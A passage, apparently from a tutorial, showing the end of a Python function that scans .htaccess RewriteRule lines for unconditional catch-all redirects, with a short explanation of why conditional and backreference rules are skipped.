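        if directive != "rewriterule" or len(parts) < 3:
            continue
        conds, pending_conds = pending_conds, 0
        pattern, target = parts[1], parts[2]
        flags = parts[3].strip("[]").split(",") if len(parts) > 3 else []
        redirect = [f for f in flags if re.fullmatch(r"(?i)R(=.+)?", f)]
        if not redirect or conds or pattern.startswith("!"):
            continue  # internal rewrite, conditional rule, or negated pattern
        if "$" in target or "%" in target:
            continue  # target is built from the request, not fixed
        try:
            matches_all = all(re.search(pattern, p) for p in PROBE_PATHS)
        except re.error:
            continue  # PCRE syntax that Python's re cannot parse
        if matches_all:
            status = redirect[0].partition("=")[2] or "302"  # bare R is a 302
            findings.append((line_no, status, line))
    return findings

if __name__ == "__main__":
    for line_no, status, rule in find_catch_all_redirects(SAMPLE_HTACCESS):
        print(f"line {line_no}: catch-all {status} redirect: {rule}")
```

Rules guarded by a RewriteCond or carrying a backreference in the target are skipped on purpose, so ordinary canonical-host and page-move redirects are not reported.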